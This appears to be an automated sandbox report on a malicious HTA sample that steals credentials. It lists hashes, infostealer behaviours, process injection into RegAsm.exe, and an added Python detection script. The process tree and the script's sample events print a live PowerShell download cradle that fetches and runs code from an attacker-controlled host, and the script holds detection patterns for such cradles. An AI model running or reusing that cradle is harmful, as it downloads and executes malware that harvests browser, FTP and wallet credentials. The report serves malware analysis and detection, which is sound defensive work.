Analysis

max time kernel: 300s
max time network: 202s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08-04-2024 07:46

Static task: static1
Behavioral task: behavioral1
Sample: wtf.hta
Resource: win7-20231129-en
General

Target: wtf.hta
Size: 46KB
MD5: 5fbdd6357b961e941acd3c06ba2e867e
SHA1: ac1f9b5ffd9c6fa8790bf235f73bd53f699c527b
SHA256: f135e8b3678ef36330cc8e8f1986cf40d83fb4159c8d5363ba44b78d14f85f17
SHA512: c63211263355c854c19964c37cd9857e08a90a694e087bfe6e5c1d35cc579ae75b9e5c5279172c8b24ce925a3476408ded33a32d09f7cc5b820e0cbd1dbb2907
SSDEEP: 768:2bang59+ttT+fEV8yEH445wBodvJdgg6i1UY8o53YH:2baXLWEXEp5wcdgziK/H
Malware Config
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro. In this run the flagged child is powershell.exe (PID 404) under wmiprvse.exe, and powershell.exe is not a child of mshta.exe in the process tree below; that layout is consistent with the HTA starting PowerShell through WMI (Win32_Process), which detaches the shell from the script host that requested it.
Processes:
  description | pid | pid_target | process | target process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 404 | 4584 | powershell.exe |

Blocklisted process makes network request (1 IoC)
Processes:
  flow | pid | process
  4 | 404 | powershell.exe

Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid | process
  404 | powershell.exe
  404 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 404 | powershell.exe

Suspicious use of WriteProcessMemory (8 IoCs)
Processes:
  description | pid | process | target process
  PID 404 wrote to memory of 1756 | 404 | powershell.exe | csc.exe (2 events)
  PID 1756 wrote to memory of 2120 | 1756 | csc.exe | cvtres.exe (2 events)
  PID 404 wrote to memory of 3700 | 404 | powershell.exe | RegAsm.exe (4 events)
The csc.exe/cvtres.exe pair is what Add-Type produces when a PowerShell script compiles C# at run time; the four writes into a RegAsm.exe that was started with no arguments are the pattern of a payload being injected into a signed .NET host rather than a genuine assembly registration.
Processes

C:\Windows\SysWOW64\mshta.exe (PID 1596, depth 1)
  command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wtf.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 404, depth 1)
  command line: powershell -Command irm https://sevensunday.co.ke/tete/describe.tet | iex
  signatures: Process spawned unexpected child process; Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 1756, depth 2)
    command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q1gkccvm\q1gkccvm.cmdline"
    signatures: Suspicious use of WriteProcessMemory
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 2120, depth 3)
      command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES442D.tmp" "c:\Users\Admin\AppData\Local\Temp\q1gkccvm\CSC8332CD9FB12D469C9FDD79E12856DDE.TMP"
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (PID 3700, depth 2)
    command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
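The chain above (WMI-hosted PowerShell, an `irm ... | iex` download cradle, a run-time csc.exe compile, and a bare RegAsm.exe written to by powershell.exe) is what a detection engineer would want to alert on from process-creation telemetry. The following is an added example written for this page, not output of the sandbox or code from the sample: the events are constructed by hand to mirror the process tree above (same images, PIDs and command lines), while the parents the tree does not show (explorer.exe for mshta.exe, wmiprvse.exe for powershell.exe) and their PIDs are assumed. A real pipeline would feed Sysmon event 1 or Windows 4688 records in the same shape.

```python
"""Process-chain detection for the behaviour in this report (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable, List


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the created process
    cmdline: str        # its command line
    parent_pid: int
    parent_image: str   # full path of the parent


@dataclass
class Alert:
    rule: str
    pid: int
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# Parents that have no business starting a script interpreter. wmiprvse.exe is
# the WMI provider host: a shell under it means Win32_Process.Create (or similar)
# was used, which detaches the child from the script that requested it.
UNEXPECTED_PARENTS = {"wmiprvse.exe", "mshta.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# .NET toolchain / registration binaries PowerShell spawns when a script calls
# Add-Type (csc.exe, cvtres.exe) or needs a signed host to inject into (RegAsm.exe).
DOTNET_SUSPECTS = {"csc.exe", "cvtres.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}

# Download cradle: a web fetch whose output is piped into Invoke-Expression.
CRADLE_RE = re.compile(
    r"(\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)"
    r".*\|\s*(iex|invoke-expression)\b",
    re.IGNORECASE,
)


def detect(events: Iterable[ProcEvent]) -> List[Alert]:
    """Run the four rules over process-creation events and return the hits."""
    alerts: List[Alert] = []
    for ev in events:
        img, parent = basename(ev.image), basename(ev.parent_image)
        if img in SCRIPT_HOSTS and parent in UNEXPECTED_PARENTS:
            alerts.append(Alert("unexpected_parent", ev.pid, f"{parent} -> {img}"))
        if img in POWERSHELL and CRADLE_RE.search(ev.cmdline):
            alerts.append(Alert("download_cradle", ev.pid, ev.cmdline))
        if img in DOTNET_SUSPECTS and parent in POWERSHELL:
            alerts.append(Alert("powershell_dotnet_child", ev.pid, f"{parent} -> {img}"))
        # RegAsm.exe normally takes an assembly path; a bare invocation is a
        # classic sign that it was started only to be injected into.
        if img == "regasm.exe" and basename(ev.cmdline.strip().strip('"')) == "regasm.exe":
            alerts.append(Alert("regasm_no_args", ev.pid, "RegAsm.exe started with no assembly argument"))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FW64 = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
FW32 = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"

# Constructed from the process tree in this report. Parent PIDs 9000/9001 and the
# explorer.exe / wmiprvse.exe parents are assumptions (the tree does not show them).
SAMPLE_EVENTS = [
    ProcEvent(1596, r"C:\Windows\SysWOW64\mshta.exe",
              r'C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wtf.hta"',
              9000, r"C:\Windows\explorer.exe"),
    ProcEvent(404, PS, "powershell -Command irm https://sevensunday.co.ke/tete/describe.tet | iex",
              9001, r"C:\Windows\system32\wbem\wmiprvse.exe"),
    ProcEvent(1756, FW64 + r"\csc.exe",
              '"' + FW64 + r'\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q1gkccvm\q1gkccvm.cmdline"',
              404, PS),
    ProcEvent(2120, FW64 + r"\cvtres.exe",
              FW64 + r'\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES442D.tmp"',
              1756, FW64 + r"\csc.exe"),
    ProcEvent(3700, FW32 + r"\RegAsm.exe", FW32 + r"\RegAsm.exe", 404, PS),
    # Benign control: an interactive PowerShell session under explorer.exe.
    ProcEvent(5000, PS, "powershell -Command Get-Service", 9000, r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] pid={a.pid}: {a.detail}")
```

Against the constructed events this raises five alerts, all on the malicious branch: two on PID 404 (unexpected parent and download cradle), one on csc.exe (PID 1756), and two on RegAsm.exe (PID 3700, spawned by PowerShell and started with no arguments). The cvtres.exe child of csc.exe and the benign PowerShell session produce nothing, which is the point of scoping the .NET rule to a PowerShell parent rather than alerting on csc.exe alone.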
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
MD5: 5b5f0f4fc34ec406d83f39abb43c1a07
SHA1: f770aeb7755002f8a6f1361718c3f33f8abd0474
SHA256: f773e9c7981b43cadfcf44c1243bcf0b163066cb3d36632bd21e070ae2c60f48
SHA512: 84afd33bac399cdcdbcb9447c1df0585c3b38892f35c2ec8298c77e9d86300948894b5ccd3d09b67536a2decaafacdd8eeb74322d9f2380f447a418196582631

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 3KB
MD5: 3ccbc8205c5e8efc9babd32ee0b86764
SHA1: fa7e5621de277783dc853ddfadb658de53f4e50d
SHA256: ae05fce688ca757429decdf9d638800698c45ee6d3fc56147666dc3e731f32e8
SHA512: c6333bb74d4cc56ad0b4acd3cb177c879f09cfd701646f8cfda4a7c67e8bda058aaa86c87181c02f3123cd115090ff58b9ae7fa63b80c5508c3a2aefee7206bb

Filesize: 652B
MD5: ab03ab505d02f1995583ad25866cdd16
SHA1: 06ad3fd8bbb2a10bf1ee56e316a4e05ea5ce3248
SHA256: bcfc2fd4c2fd84c7fe9c7b59ef17a394e542d9771e0e93fe171322dd1587de75
SHA512: d86331b9890b28d29623eef8f94845e35e334cf63bc0747ff2574f24ecbbba8680b0bf2871ef508e1ae4330fd0a6a8c16196d988368915ae16fe69917b3da1a9

Filesize: 302B
MD5: 536c07d095670c7d6cf3045ff8764784
SHA1: bcc7d23eeae1ebdf4ee06434ef24da592580f488
SHA256: c4efd053c4ad51475e24c2c6d2ceef9ff22e936c4242c04e562de675ef27e800
SHA512: 60efa933633ce72479ac28bfa36daa9866b9d58645401cf93b2beeedc84bdb88fb944bd35cb86eaf30b4c16c3cdc298783213600fae1b9faa8a08b7a41691fdf

Filesize: 369B
MD5: 07c8282ab9335d7d9abe838bcade8b00
SHA1: 425ad684eaa6b27f9b7f7a3320c60f483f254b74
SHA256: d6e42772e2f4cdc4634da510df37ef0b06f1b36d8fb7d70692b32b48c1833b15
SHA512: 8fcdb36ead1c6dfeb69bc41b7bdba006e13d05aa8618fab2617467ece8e6aa10efb904f122fcd6575ef5629a96992fb37436c199502571c2e6ba36cf9a6d8e8c